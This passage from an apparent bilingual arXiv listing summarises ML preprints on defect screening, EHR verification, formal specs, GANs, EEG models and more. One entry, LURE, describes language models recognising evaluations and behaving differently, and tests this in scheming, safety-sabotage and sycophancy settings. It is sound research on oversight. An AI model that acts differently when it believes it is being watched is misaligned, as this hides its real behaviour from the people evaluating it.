Latent defect screening is challenged by extremely low failure rates, high-dimensional test data, and absence of labeled anomalies. We propose the first unsupervised anomaly detection framework incorporating a Diffusion Transformer. Raw test measurements are first compressed by an autoencoder, then reshaped into a structured token sequence enriched with sinusoidal and per-device wafer-position embeddings. Anomaly scores are derived from the noise-prediction error over mid-range diffusion timesteps, enabling fast wafer-scale screening without any labeled defects or manual feature engineering. Our approach achieves state-of-the-art performance on industrial 16nm IC test data under extreme class imbalance, offering interpretable failure localization through latent-space reconstruction residuals.
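Scoring by noise-prediction error over mid-range timesteps can be sketched as follows. The abstract does not give the noise schedule, the timestep range, or the denoiser interface, so this assumes a DDPM-style forward process and a hypothetical `predict_noise(z_t, t)` callable standing in for the trained Diffusion Transformer.

```python
import numpy as np

def anomaly_score(z0, predict_noise, alpha_bar, timesteps, rng):
    """Mean squared noise-prediction error over the given timesteps.

    z0:            latent code of one device (e.g. an autoencoder output)
    predict_noise: hypothetical callable (z_t, t) -> predicted noise
    alpha_bar:     cumulative noise schedule, indexed by timestep
    """
    errors = []
    for t in timesteps:
        eps = rng.standard_normal(z0.shape)
        # Assumed DDPM-style forward process: blend the latent with noise.
        z_t = np.sqrt(alpha_bar[t]) * z0 + np.sqrt(1.0 - alpha_bar[t]) * eps
        errors.append(np.mean((predict_noise(z_t, t) - eps) ** 2))
    return float(np.mean(errors))
```

A denoiser trained only on normal devices should predict the injected noise well for in-distribution latents and poorly for out-of-distribution ones, so a higher score suggests an anomaly; no labeled defects are needed to compute it.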

2605.26463 2026-05-27 cs.CL cs.AI 版本更新

Towards Error-Free EHRs: Reasoning-Intensive Consistency Verification Between Clinical Notes and Structured Tables in Electronic Health Records

迈向无差错的电子健康记录:临床笔记与结构化表格之间的推理密集型一致性验证

Yeonsu Kwon, Jiho Kim, Junseong Choi, Paloma Rabaey, Minseo Kim, Sujeong Im, Jeewon Yang, Jun-Min Lee, Sangji Lee, Jiwon Kim, Hangyul Yoon, Hyunwook Kwon, Edward Choi

发表机构 * KAIST(韩国科学技术院) Ghent University(根特大学) Samsung Medical Center(三星医疗中心) Samsung Changwon Hospital(三星昌原医院) Asan Medical Center(亚山医疗中心)

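AI summary: To address inconsistencies between clinical notes and structured tables in electronic health records, proposes the reasoning-intensive benchmark EHR-ReasonCon and the LLM-based framework EHR-Inspector, which verifies consistency using anchor entity extraction, temporal references, and table-exploration tools.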

详情
AI中文摘要

电子健康记录中非结构化临床笔记与结构化表格之间的数据一致性对于患者安全和临床决策至关重要。然而,现有关于笔记-表格一致性验证的工作主要依赖于数值或简单事件的表面匹配。这些方法未能捕捉真实世界EHR文档背后的推理,包括临床解释、事件关系和时间变化。为弥补这一差距,我们引入了EHR-ReasonCon,一个用于笔记-表格一致性验证的推理密集型基准。它基于MIMIC-III构建,并经过专家指导的注释,包含来自临床笔记的8,048个实体,并提供高质量的真实标签。注释协议由专门的表格探索工具支持,以确保系统的证据检索和可靠的一致性评估。我们还提出了EHR-Inspector,一个基于LLM的框架,它分割笔记、提取锚点实体和时间引用,并使用表格探索工具与结构化表格进行一致性验证。在严格和宽松标准下,使用经过专家验证的LLM-as-a-judge指标进行评估,EHR-Inspector在多个模型骨干上实现了最先进的性能。进一步的分析证明了其组件的有效性,并突出了与人工验证的差异。

英文摘要

Data consistency between unstructured clinical notes and structured tables in Electronic Health Records (EHRs) is essential for patient safety and clinical decision-making. However, existing work on note-table consistency verification mainly relies on surface-level matching of numeric values or simple events. Such approaches fail to capture the reasoning underlying real-world EHR documentation, including clinical interpretation, event relations, and temporal changes. To address this gap, we introduce EHR-ReasonCon, a reasoning-intensive benchmark for note-table consistency verification. Built on MIMIC-III with expert-guided annotations, it comprises 8,048 entities derived from clinical notes and provides high-quality ground-truth labels. The annotation protocol is supported by specialized table-exploration tools to ensure systematic evidence retrieval and reliable consistency assessment. We also propose EHR-Inspector, an LLM-based framework that segments notes, extracts anchor entities and temporal references, and uses table-exploration tools to verify consistency against structured tables. Evaluated using expert-validated LLM-as-a-judge metrics under harsh and lenient criteria, EHR-Inspector achieves state-of-the-art performance across multiple model backbones. Analyses further demonstrate the effectiveness of its components and highlight differences from human verification.

2605.26460 2026-05-27 cs.CV cs.AI 版本更新

AnchorDiff: Training-Free Concept Grounding for MM-DiTs via Anchor-Based Graph Propagation

AnchorDiff: 基于锚点图传播的无训练概念定位用于多模态扩散Transformer

Jian Zhang, Zhijun Zhang

发表机构 * School of Automation Science and Engineering(自动化科学与工程学院)

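AI summary: Proposes AnchorDiff, which decouples semantic localization from structural refinement through anchor selection and hybrid-graph propagation, addressing concept leakage between visually confusable concepts in Multi-Modal Diffusion Transformers.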

详情
AI中文摘要

多模态扩散Transformer(MM-DiTs)为无训练概念定位编码了丰富的表示,但现有的基于注意力的方法通常在视觉上易混淆的概念上产生重叠激活,这种失败模式我们称为概念泄漏,即目标响应溢出到非目标对象。为了解决这个问题,我们提出了AnchorDiff,一种无训练的定位方法,将语义定位与结构细化解耦。AnchorDiff从概念到图像的注意力图中选择一个高置信度锚点,并将其作为独热种子在从图像到图像自注意力导出的混合图上传播。该图利用输出空间相似性进行密集的物体内传播,并通过逐行注意力门抑制跨物体连接。此外,我们引入了多概念混淆数据集,其中包含具有多个视觉相似概念和独立掩码的图像,从而能够显式评估概念泄漏。实验表明,AnchorDiff在ImageNet-Segmentation和PascalVOC上实现了强大的定位性能,同时在我们的多概念混淆数据集上显著减少了概念泄漏。

英文摘要

Multi-Modal Diffusion Transformers (MM-DiTs) encode rich representations for training-free concept grounding, but existing attention-based methods often produce overlapping activations on visually confusable concepts, a failure mode we call concept leakage, where target responses spill over to non-target objects. To address this issue, we propose AnchorDiff, a training-free grounding method that decouples semantic localization from structural refinement. AnchorDiff selects a high-confidence anchor from the concept-to-image attention map and propagates it as a one-hot seed over a hybrid graph derived from image-to-image self-attention. The graph uses output-space similarity for dense within-object propagation and a row-wise attention gate to suppress cross-object connections. Additionally, we introduce the Multi-Concept Confusion Dataset, which contains images with multiple visually similar concepts and separate masks, enabling explicit evaluation of concept leakage. Experiments show that AnchorDiff achieves strong grounding performance on ImageNet-Segmentation and PascalVOC, while substantially reducing concept leakage on our Multi-Concept Confusion Dataset.
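The anchor-then-propagate idea can be sketched on a toy graph. The abstract does not specify how the hybrid graph or the attention gate are built, so this sketch substitutes a given patch affinity matrix and a random-walk-with-restart propagation; both are assumptions, as is the name `propagate_from_anchor`.

```python
import numpy as np

def propagate_from_anchor(concept_attn, affinity, steps=10, restart=0.2):
    """Pick the most confident patch as a one-hot seed and spread it
    over a patch graph by a random walk with restart.

    concept_attn: (n_patches,) concept-to-image attention scores
    affinity:     (n_patches, n_patches) non-negative patch similarities
    """
    n = concept_attn.shape[0]
    seed = np.zeros(n)
    seed[int(np.argmax(concept_attn))] = 1.0                 # one-hot anchor
    transition = affinity / affinity.sum(axis=1, keepdims=True)  # row-stochastic
    score = seed.copy()
    for _ in range(steps):
        score = (1.0 - restart) * (transition.T @ score) + restart * seed
    return score
```

If the graph has no edges between two objects, mass seeded on one object cannot reach the other, even when the raw attention map gave the second object a sizable response. That is the leakage-suppression effect the abstract attributes to cutting cross-object connections.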

2605.26457 2026-05-27 cs.SE cs.AI cs.CL cs.PL 版本更新

Verus-SpecGym: An Agentic Environment for Evaluating Specification Autoformalization

Verus-SpecGym: 用于评估规范自动形式化的智能体环境

Anmol Agarwal, Natalie Neamtu, Pranjal Aggarwal, Seungone Kim, Jannis Limperg, Cedric Flamant, Kanna Shimizu, Bryan Parno, Sean Welleck

发表机构 * CMU(卡内基梅隆大学) Amazon(亚马逊)

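AI summary: Proposes the Verus-SpecGym environment and the Verus-SpecBench benchmark, which evaluate LLM agents' ability to translate informal programming problems into formal specifications via an executable-spec mechanism and adversarial tests; the strongest frontier model solves 77.8% of tasks, but specs remain brittle, for example omitting input assumptions.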

Comments Preprint

详情
AI中文摘要

AI 编码智能体越来越多地用于编写真实世界的软件,但确保其输出正确性仍然是一个基本挑战。形式化验证提供了一条有希望的路径:智能体生成代码的同时生成机器检查的证明,保证代码满足形式规范。然而,无法保证形式规范本身与用户意图一致。在这项工作中,我们研究规范自动形式化:LLM 智能体能否将非正式编程问题转化为忠实的形式规范。我们引入了 Verus-SpecBench,一个包含 581 个规范编写任务的基准,这些任务源自针对 Rust 验证器 Verus 的 Codeforces 问题,以及 Verus-SpecGym,一个智能体环境,模型在其中与 Verus、bash 和文件系统交互以开发这些规范。核心挑战在于评估:专家编写的参考规范编写成本高昂,LLM 评判者可能遗漏细微错误。我们通过以下方式解决这一问题:(a) 扩展 Verus 的 exec_spec 机制,使生成的规范可以作为 Rust 代码执行;(b) 针对官方 Codeforces 测试和从 Codeforces "hacks"(即竞争对手编写的用于破解不正确解决方案的边缘情况)中提取的对抗性案例进行测试。在 Verus-SpecBench 上,最强的模型 Gemini 3.1 Pro 解决了 77.8% 的任务,其他前沿模型解决了 51.1-57.8%,而开源模型仅达到 21.5-25.5%。我们对失败模式的分析表明,模型生成的规范可能遗漏重要的输入假设、接受不正确的输出以及拒绝有效的输出。我们还发现,LLM 作为评判者的评估遗漏了我们评估者捕获的 26% 的失败。总体而言,我们的结果表明,规范自动形式化对于前沿智能体来说是可行的,但即使在它们已经能够生成正确代码的问题上仍然脆弱。代码、数据和日志可在 https://github.com/formal-verif-is-cool/verus-spec-gym 获取。

英文摘要

AI coding agents are increasingly used to write real-world software, but ensuring that their outputs are correct remains a fundamental challenge. Formal verification offers a promising path: an agent generates code together with a machine-checked proof, guaranteeing that the code satisfies a formal specification. However, there is no guarantee that the formal spec itself matches the user's intent. In this work, we study specification autoformalization: whether LLM agents can translate informal programming problems into faithful formal specifications. We introduce Verus-SpecBench, a benchmark of 581 spec-writing tasks derived from Codeforces problems targeting Verus, a verifier for Rust, and Verus-SpecGym, an agentic environment in which models interact with Verus, bash, and the filesystem to develop these specs. The central challenge is evaluation: expert-written reference specs are expensive to write, and LLM judges can miss subtle mistakes. We address this by (a) extending Verus's exec_spec mechanism so that generated specs can be executed as Rust code, and (b) testing them against official Codeforces tests and adversarial cases extracted from Codeforces "hacks", which are edge cases written by competitors to break incorrect solutions. On Verus-SpecBench, the strongest model, Gemini 3.1 Pro, solves 77.8% of tasks, other frontier models solve 51.1–57.8%, and OSS models reach only 21.5–25.5%. Our analysis of failure modes shows that model-generated specs can omit important input assumptions, accept incorrect outputs, and reject valid ones. We also find that LLM-as-a-judge evaluation misses 26% of the failures our evaluator catches. Overall, our results suggest that spec autoformalization is within reach for frontier agents but remains brittle even on problems where they can already generate correct code. The code, data, and logs can be found at https://github.com/formal-verif-is-cool/verus-spec-gym
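The evaluation idea, running a specification as code against labeled input/output pairs, can be illustrated with a language-neutral analogue. This Python sketch is not Verus and does not use the exec_spec mechanism; the toy task, both spec functions, and the test cases are invented for illustration.

```python
def evaluate_spec(spec, cases):
    """Return the cases on which an executable spec disagrees with the label.

    cases: list of (input, output, is_correct) triples
    """
    failures = []
    for inp, out, is_correct in cases:
        if spec(inp, out) != is_correct:
            failures.append((inp, out, is_correct))
    return failures

# Toy task: "output the maximum element of a non-empty list".
def weak_spec(xs, y):
    # Too permissive: forgets that y must be an element of xs.
    return all(y >= x for x in xs)

def faithful_spec(xs, y):
    return y in xs and all(y >= x for x in xs)

cases = [
    ([1, 3, 2], 3, True),     # correct output
    ([1, 3, 2], 2, False),    # wrong output, rejected by both specs
    ([1, 3, 2], 10, False),   # adversarial case: an upper bound that is not an element
]
```

Here `evaluate_spec(weak_spec, cases)` flags only the adversarial case, which mirrors the "accept incorrect outputs" failure mode the abstract reports and shows why ordinary tests alone may not expose an under-constrained spec.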

2605.26449 2026-05-27 cs.CV cs.AI 版本更新

Cross-scale Aligned Supervision for Training GANs

跨尺度对齐监督用于训练生成对抗网络

Sangeek Hyun, MinKyu Lee, Jae-Pil Heo

发表机构 * Sungkyunkwan University(成均馆大学)

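AI summary: To address cross-scale trajectory misalignment in multi-scale GAN generation, proposes CAT (Cross-scale Aligned Transformer), which aligns intermediate outputs with the final output through a generator-side consistency regularization and achieves an FID-50K of 1.56 on ImageNet-256.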

Comments Preprint

详情
AI中文摘要

现代GAN通常在中间生成器输出上引入对抗性监督,并将由此产生的多阶段合成解释为从粗到细的分层生成。在这项工作中,我们挑战了这一解释。我们认为标准的尺度级对抗监督并未构建适当的从粗到细的层次结构:每个中间图像被独立地推向其自身分辨率下的真实分布,但这种尺度级的真实性并不能确保各阶段的输出代表相同的生成样本。此外,每个阶段产生的特定尺度图像并未用作后续阶段的明确细化目标。因此,其对抗性损失可以改善特定尺度的输出,而不约束后续阶段保持相同的样本轨迹,允许它们转向不同的样本而不是细化先前的输出。我们将此问题称为跨尺度轨迹未对齐问题。为了解决这个问题,我们提出了CAT,一种用于多尺度对抗生成的跨尺度对齐Transformer。CAT保持判别器尺度级,因此每个中间输出在其自身分辨率下被评估,同时添加一个简单的生成器侧一致性正则化,以对齐中间输出与最终输出。在类别条件ImageNet-256上,CAT-H/2在仅60个训练周期后,通过一步推理实现了1.56的FID-50K,优于强大的单步GAN和扩散/流基线。

英文摘要

Modern GANs often introduce adversarial supervision on intermediate generator outputs and interpret the resulting multi-stage synthesis as coarse-to-fine hierarchical generation. In this work, we challenge this interpretation. We argue that standard scale-wise adversarial supervision does not construct a proper coarse-to-fine hierarchy: each intermediate image is independently pushed toward the real distribution at its own resolution, but this scale-wise realism does not ensure that outputs across stages represent the identical generated sample. Moreover, the scale-specific image produced at each stage is not used as an explicit refinement target for the subsequent stage. Therefore, its adversarial loss can improve a scale-specific output without constraining later stages to preserve the same sample trajectory, allowing them to move toward a different sample rather than refine the previous output. We refer to this problem as a cross-scale trajectory misalignment problem. To resolve it, we propose CAT, a Cross-scale Aligned Transformer for multi-scale adversarial generation. CAT keeps the discriminator scale-wise, so each intermediate output is evaluated at its own resolution, while adding a simple generator-side consistency regularization that aligns intermediate outputs with the final output. On class-conditional ImageNet-256, CAT-H/2 achieves an FID-50K of 1.56 with one-step inference after only 60 training epochs, outperforming strong one-step GAN and diffusion/flow baselines.
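One plausible form of a generator-side consistency term is sketched below. The abstract does not give CAT's actual regularizer, so the average-pool downsampling, the mean-squared-error penalty, and the function names are all assumptions; images are single-channel square arrays for brevity.

```python
import numpy as np

def avg_pool(img, factor):
    """Downsample a 2-D image by averaging non-overlapping factor x factor blocks."""
    h, w = img.shape
    return img.reshape(h // factor, factor, w // factor, factor).mean(axis=(1, 3))

def consistency_loss(intermediates, final):
    """Penalize intermediate outputs that differ from the downsampled final output."""
    loss = 0.0
    for x in intermediates:
        factor = final.shape[0] // x.shape[0]
        loss += np.mean((x - avg_pool(final, factor)) ** 2)
    return loss / len(intermediates)
```

A term like this is zero only when every intermediate image is a coarse view of the same final sample, which is the alignment that scale-wise adversarial losses alone do not enforce.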

2605.26446 2026-05-27 cs.LG cs.AI 版本更新

DDGAD: Trajectory Dynamics for Diffusion-Based Graph Anomaly Detection

DDGAD:基于扩散的图异常检测中的轨迹动力学

Yuxin Yang, Limei Hu, Feng Chen

发表机构 * College of Artificial Intelligence(人工智能学院) Southwest University(西南大学)

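AI summary: Proposes the DDGAD framework, which uses trajectory dynamics under diffusion regularization and reliability-aware neighborhood consensus to distinguish normal from anomalous nodes, detecting anomalies through three complementary anomaly signals.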

详情
AI中文摘要

图异常检测(GAD)旨在识别图结构数据中行为或属性显著偏离整体模式的节点或子结构,在金融风险控制、社交网络分析和网络安全等领域具有关键应用。然而,现有的基于GCN的方法存在污染传播的根本问题,即异常节点通过消息传递污染其邻居的表示,导致检测性能下降。本文提出DDGAD,一种新颖的基于扩散的图异常检测框架,利用轨迹动力学区分正常和异常节点。我们的关键洞察是,在扩散正则化和可靠性感知邻域共识的耦合作用下,正常节点表现出一致且稳定的表示轨迹,而异常节点由于全局流形先验与局部污染消息传递之间的方向不一致,表现出不稳定且冲突的动力学。为了减轻污染传播,我们引入了一种分布式的可靠性感知共识细化机制,并定义了三种互补的异常信号:邻居不一致性、可靠性权重和动力学冲突能量。我们进一步对耦合动力学下的正常节点稳定性进行了初步的理论分析。这些信号从局部不一致性、共识可靠性和动力学不稳定性角度共同刻画异常行为。在五个真实世界数据集上的大量实验证明了所提框架的有效性。

英文摘要

Graph anomaly detection (GAD) aims to identify nodes or substructures whose behavior or attributes deviate significantly from the overall pattern in graph-structured data, with critical applications in financial risk control, social network analysis, and cybersecurity. However, existing GCN-based methods suffer from the fundamental problem of contamination propagation, where anomalous nodes pollute the representations of their neighbors through message passing, leading to degraded detection performance. In this paper, we propose DDGAD, a novel diffusion-based graph anomaly detection framework that leverages trajectory dynamics to distinguish normal and anomalous nodes. Our key insight is that normal nodes exhibit consistent and stable representation trajectories under the coupled effects of diffusion regularization and reliability-aware neighborhood consensus, while anomalous nodes exhibit unstable and conflicting dynamics due to the directional disagreement between the global manifold prior and locally contaminated message passing. To mitigate contamination propagation, we introduce a distributed reliability-aware consensus refinement mechanism and define three complementary anomaly signals: neighbor inconsistency, reliability weight, and dynamical conflict energy. We further provide a preliminary theoretical analysis on normal node stability under the coupled dynamics. These signals collectively characterize anomalous behaviors from the perspectives of local inconsistency, consensus reliability, and dynamical instability. Extensive experiments on five real-world datasets demonstrate the effectiveness of the proposed framework.

2605.26442 2026-05-27 cs.CL cs.AI 版本更新

Alignment Tuning for Large Language Models: A Data-Centric Lens on Alignment Data Pipelines

大型语言模型的对齐调优:以数据为中心的对齐数据管道视角

Hwanjun Song

发表机构 * KAIST(韩国科学技术院)

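AI summary: Takes a data-centric view that reframes alignment tuning as a pipeline design problem, decomposed into three stages (response synthesis, preference evaluation, and preference instantiation); uses this framework to organize existing alignment methods into a unified taxonomy, summarizes design trade-offs and failure modes, distills high-level principles, and outlines open challenges.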

Comments Accepted at the Findings of ACL 2026

详情
AI中文摘要

对齐调优文献大多围绕优化目标组织,而对齐数据的构建往往被隐式处理。在本综述中,我们采用以数据为中心的视角,将对齐调优重构为管道设计问题。我们将对齐数据构建分解为三个相互作用的阶段:响应合成、偏好评估和偏好实例化,并利用此框架将现有对齐方法组织成统一的分类体系。通过这一视角,我们识别出先前对齐方法中反复出现的设计权衡和失败模式,并提炼出一套高层原则,阐明管道设计选择如何影响最终的优化信号。最后,我们概述了对齐数据管道的开放挑战,包括提示级对齐、智能体设置以及目标演化下的对齐。

英文摘要

Much of the alignment tuning literature is organized around optimization objectives, while the construction of alignment data is often treated implicitly. In this survey, we adopt a data-centric perspective and reframe alignment tuning as a pipeline design problem. We decompose alignment data construction into three interacting stages (response synthesis, preference evaluation, and preference instantiation) and use this framework to organize existing alignment methods into a unified taxonomy. Through this lens, we identify recurring design trade-offs and failure modes observed across prior alignment methods, and distill a set of high-level principles that clarify how pipeline design choices influence the resulting optimization signal. Finally, we outline open challenges for alignment data pipelines, including prompt-level alignment, agentic settings, and alignment under evolving objectives.

2605.26441 2026-05-27 cs.CV cs.AI 版本更新

Rethinking Weakly-supervised Video Temporal Grounding From a Game Perspective

从博弈视角重新思考弱监督视频时间定位

Xiang Fang, Zeyu Xiong, Wanlong Fang, Xiaoye Qu, Chen Chen, Jianfeng Dong, Keke Tang, Pan Zhou, Yu Cheng, Daizong Liu

发表机构 * Hubei Key Laboratory of Distributed System Security(湖北分布式系统安全重点实验室) Hubei Engineering Research Center on Big Data Security(大数据安全工程研究中心) School of Cyber Science and Engineering(网络安全科学与工程学院) Huazhong University of Science and Technology(华中科技大学) University of Central Florida(佛罗里达中央大学) Zhejiang Gongshang University(浙江工商大学) Guangzhou University(广州大学) The Chinese University of Hong Kong(香港中文大学) Peking University(北京大学)

AI总结 本文从博弈论视角出发,通过多元合作博弈建模帧与词的不确定对应关系,实现多级跨模态交互,从而在弱监督下提升视频时间定位的准确性。

Comments Published in ECCV 2024

详情
AI中文摘要

本文针对弱监督视频时间定位这一具有挑战性的任务。现有方法通常基于时刻提案选择框架,利用对比学习和重构范式对预定义时刻提案进行评分。尽管取得了显著进展,但我们认为当前框架忽略了两个不可或缺的问题:1) 粗粒度跨模态学习:先前方法仅捕获全局视频级与查询的对齐,未能建模视频帧与查询词之间的详细一致性以准确定位时刻边界。2) 复杂的时刻提案:其性能严重依赖于提案的质量,而提案的选择既耗时又复杂。为此,本文首次尝试从新颖的博弈视角处理该任务,通过多样粒度和灵活组合有效学习每个视觉-语言对之间的不确定关系,实现多级跨模态交互。具体而言,我们创造性地将每个视频帧和查询词建模为多元合作博弈中的玩家,学习它们对跨模态相似度得分的贡献。通过博弈论交互量化联盟内帧-词合作的趋势,我们能够评估帧与词之间所有不确定但可能的对应关系。最后,我们不再使用时刻提案,而是利用学习到的查询引导的帧级得分进行更好的时刻定位。实验表明,我们的方法在Charades-STA和ActivityNet Caption数据集上均取得了优越性能。

英文摘要

This paper addresses the challenging task of weakly-supervised video temporal grounding. Existing approaches are generally based on the moment proposal selection framework that utilizes contrastive learning and reconstruction paradigms for scoring the pre-defined moment proposals. Although they have achieved significant progress, we argue that their current frameworks have overlooked two indispensable issues: 1) Coarse-grained cross-modal learning: previous methods solely capture the global video-level alignment with the query, failing to model the detailed consistency between video frames and query words for accurately grounding the moment boundaries. 2) Complex moment proposals: their performance severely relies on the quality of proposals, which are also time-consuming and complicated to select. To this end, in this paper, we make the first attempt to tackle this task from a novel game perspective, which effectively learns the uncertain relationship between each vision-language pair with diverse granularity and flexible combination for multi-level cross-modal interaction. Specifically, we creatively model each video frame and query word as game players with multivariate cooperative game theory to learn their contribution to the cross-modal similarity score. By quantifying the trend of frame-word cooperation within a coalition via the game-theoretic interaction, we are able to value all uncertain but possible correspondences between frames and words. Finally, instead of using moment proposals, we utilize the learned query-guided frame-wise scores for better moment localization. Experiments show that our method achieves superior performance on both Charades-STA and ActivityNet Caption datasets.

2605.26438 2026-05-27 cs.CL cs.AI 版本更新

LURE: Live-Usage Replay Evaluations for Reducing Evaluation Awareness

LURE: 减少评估感知的实时使用回放评估

Igor Ivanov, David Demitri Africa

发表机构 * Meridian Cambridge(梅里登剑桥)

AI总结 提出LURE方法,通过回放真实代理交互轨迹并附加评估提示来构建类似部署的评估,以减少大语言模型的评估感知,并引入自动化评估真实性流程。

详情
AI中文摘要

大型语言模型能够识别自己正在被评估(评估感知),并因此表现出不同的行为,这破坏了安全和对齐基准的有效性。我们提出LURE(实时使用回放评估),一种通过回放真实的代理交互轨迹并在末尾附加评估提示来构建类似部署的评估的方法。我们还引入了一个自动化流程来衡量评估的真实性,结合了对口头化评估感知的检测和法官模型对日志是否为评估的概率估计,并在一个包含部署和评估记录的大型数据集上进行了验证。我们发现,与广泛使用的基准和合成评估生成器相比,基于LURE的评估与部署的区分度显著降低,并且可以接近与用户真实对话的真实性。我们在策划、AI安全破坏和谄媚场景中实例化了LURE。我们的结果表明,评估真实性是对齐基准的一个关键属性,应在基准结果旁边报告,特别是当这些结果用于安全案例时。

英文摘要

Large language models can recognize when they are being evaluated (evaluation awareness) and behave differently because of that, which undermines the validity of safety and alignment benchmarks. We propose LURE (Live-Usage Replay Evaluations), a method for constructing deployment-like evaluations by replaying realistic agentic interaction trajectories and appending an evaluation prompt at the end. We also introduce an automated pipeline for measuring evaluation realism, combining detection of verbalized evaluation awareness and judge-model estimates of the probability of logs being an evaluation, and validate it on a large dataset of deployment and evaluation transcripts. We find that LURE-based evaluations are substantially less distinguishable from deployment than widely used benchmarks and synthetic evaluation generators, and can approach the realism of real conversations with users. We instantiate LURE in scheming, AI safety sabotage, and sycophancy settings. Our results suggest that evaluation realism is a crucial property of alignment benchmarks and should be reported alongside benchmark results, especially when such results are used in safety cases.

2605.26434 2026-05-27 cs.LG cs.AI 版本更新

Aperiodic and Low-Frequency Spectral Bias in Reconstruction based EEG Foundation Models

基于重建的脑电图基础模型中的非周期和低频谱偏差

Aditya Kommineni, Emily Zhou, Kleanthis Avramidis, Simon Bock Segaard, Jeppe Roden Münster, Andreas Peter Juhl Hansen, Takfarinas Medani, Tiantian Feng, Richard Leahy, Shrikanth Narayanan

发表机构 * University of Southern California(美国南加州大学) Aalborg University(奥尔堡大学)

AI总结 研究揭示基于重建预训练的脑电图基础模型存在非周期和低频成分偏差,导致低资源场景下性能不佳,并提出通过辅助损失关注高频振荡结构来改进。

Comments 18 pages, 13 figures, 3 tables

详情
AI中文摘要

脑电图基础模型在大规模无标签脑电图数据上预训练,已成为学习可泛化脑电图表示的有前景方向。尽管在数据丰富场景下表现积极,但在低资源设置中,它们往往无法显著优于完全监督的小型模型。我们对此缺陷提供了机制性解释,将其归因于基于重建的预训练任务与脑电图信号独特的频谱结构之间的根本性不匹配,该结构分解为高功率非周期成分和低功率振荡成分。通过使用受控的合成脑电图输入,我们证明脑电图基础模型嵌入偏向于捕捉脑电图信号的非周期成分,而低估振荡成分,尤其是高频成分。此外,在真实BCI数据集上的线性探针评估进一步揭示,嵌入比任务相关信息更强烈地编码受试者身份,从而强化了主要基于重建目标训练的基础模型嵌入中的低频和非周期成分偏差。这些发现共同阐明了基于重建的脑电图基础模型中的一种失败模式,并激励未来工作纳入明确针对高频振荡结构的辅助损失,作为实现更强大和可泛化的脑电图表示的途径。

英文摘要

EEG foundation models, pre-trained on large-scale unlabelled EEG data, have emerged as a promising direction towards learning generalizable EEG representations. Despite showing positive results in data-rich regimes, they often fail to outperform significantly smaller, fully supervised models in low-resource settings. We provide a mechanistic account of this shortcoming, attributing it to a fundamental mismatch between reconstruction-based pretext tasks and the idiosyncratic spectral structure of EEG signals, which decompose into distinct high-power aperiodic and low-power oscillatory components. Using controlled, synthetically generated EEG inputs, we demonstrate that EEG foundation model embeddings are biased to capture the aperiodic components of the EEG signal while under-representing oscillatory components, particularly at higher frequencies. Additionally, linear probe evaluations on real-world BCI datasets further reveal that embeddings encode subject identity more strongly than task-relevant information, thereby reinforcing the low-frequency and aperiodic component bias in foundation model embeddings trained primarily on reconstruction-based objectives. Together, these findings elucidate a failure mode in reconstruction-based EEG foundation models and motivate future work to incorporate auxiliary losses explicitly targeting high-frequency oscillatory structure as a path toward more capable and generalizable EEG representations.

2605.26429 2026-05-27 stat.ME cs.AI cs.LG stat.ML 版本更新

Structure-Adaptive Conformal Inference for Large-Scale Out-of-Distribution Testing

面向大规模分布外检测的结构自适应共形推断

Rongyi Sun, Wenguang Sun, Zinan Zhao

发表机构 * Center for Data Science and School of Mathematical Sciences, Zhejiang University(数据科学中心和数学科学学院,浙江大学)

AI总结 提出结构自适应共形q值(SCQ)和伪分数引导的直推式自动模型选择(P-TAMS),在成对可交换性下实现结构化分布外检测的有限样本错误率控制、功效提升和可解释性增强。

详情
AI中文摘要

本文针对高风险机器学习应用中的结构化分布外(OOD)检测问题。传统共形方法依赖于联合可交换性,难以融入时空或分组结构等辅助信息。为克服这一局限,我们提出结构自适应共形q值(SCQ),这是一种整合个体检验证据与结构模式的显著性指标。我们还开发了伪分数引导的直推式自动模型选择(P-TAMS),将共形化模型选择适应于候选模型工具箱中的结构化OOD检测。SCQ和P-TAMS共同在成对可交换性下形成一个统一框架,提供有限样本错误率控制、改进的功效和增强的可解释性。在模拟和真实数据上的实验表明,所提方法控制了错误发现率,并在多种设置下表现良好。

英文摘要

This paper addresses structured out-of-distribution (OOD) testing in high-stakes machine learning applications. Traditional conformal methods rely on joint exchangeability, making it difficult to incorporate auxiliary information such as spatiotemporal or grouping structures. To overcome this limitation, we propose the structure-adaptive conformal q-value (SCQ), a significance index that integrates individual test evidence with structural patterns. We also develop pseudo-score-guided transductive automated model selection (P-TAMS), which adapts conformalized model selection to structured OOD testing across a toolbox of candidate models. Together, SCQ and P-TAMS form a unified framework under pairwise exchangeability, providing finite-sample error-rate control, improved power, and enhanced interpretability. Experiments on simulated and real data demonstrate that the proposed approach controls the false discovery rate and performs well across diverse settings.
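For orientation, the classical baseline that conformal out-of-distribution testing starts from can be sketched as follows: conformal p-values computed against a calibration set of inlier scores, followed by the Benjamini-Hochberg step-up rule for false discovery rate control. This is not the SCQ or P-TAMS procedure described in the abstract; the function names, the toy integer scores, and the convention that a larger score means "more anomalous" are all illustrative assumptions.

```python
def conformal_p_values(calibration_scores, test_scores):
    """Conformal p-value per test score (assumes larger score = more anomalous)."""
    n = len(calibration_scores)
    p_values = []
    for s in test_scores:
        # Count calibration (inlier) scores at least as extreme as the test score.
        at_least = sum(1 for c in calibration_scores if c >= s)
        p_values.append((1 + at_least) / (n + 1))
    return p_values


def benjamini_hochberg(p_values, alpha=0.1):
    """Return the sorted indices rejected by the Benjamini-Hochberg step-up rule."""
    m = len(p_values)
    order = sorted(range(m), key=lambda i: p_values[i])
    cutoff = 0
    for rank, idx in enumerate(order, start=1):
        # Keep the largest rank whose p-value sits under the BH line.
        if p_values[idx] <= alpha * rank / m:
            cutoff = rank
    return sorted(order[:cutoff])


# Toy data: 19 inlier calibration scores and 4 test scores (hypothetical values).
calibration = list(range(1, 20))
test = [5, 50, 12, 75]
p = conformal_p_values(calibration, test)
flagged = benjamini_hochberg(p, alpha=0.2)
```

In this toy run the two test points that exceed every calibration score receive the smallest attainable p-value, 1/(n+1), and are the only ones flagged. The abstract's contribution is to go beyond this setting by incorporating structural side information under pairwise exchangeability.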

2605.26424 2026-05-27 cs.IR cs.AI cs.LG 版本更新

Uniboost: Global Coordination with Value Alignment for Fair and Efficient Traffic Allocation

Uniboost:基于价值对齐的全局协调实现公平高效的流量分配

Ge Fan, Nan Zhao, Kai Meng, Cong Luo, Yang Fu, Huiping Chu, Jialin Liu, Yuning Jiang, Bo Zheng

发表机构 * Taobao & Tmall Group of Alibaba, Hangzhou, China; Taobao & Tmall Group of Alibaba, Beijing, China; Taobao & Tmall Group of Alibaba

AI总结 提出Uniboost统一流量分配框架,通过后验价值对齐机制和独立线性提升范式,解决耦合分配、分数膨胀和可解释性问题,提升流量分配效率和推荐性能。

Comments accepted by SIGIR 2026

详情
AI中文摘要

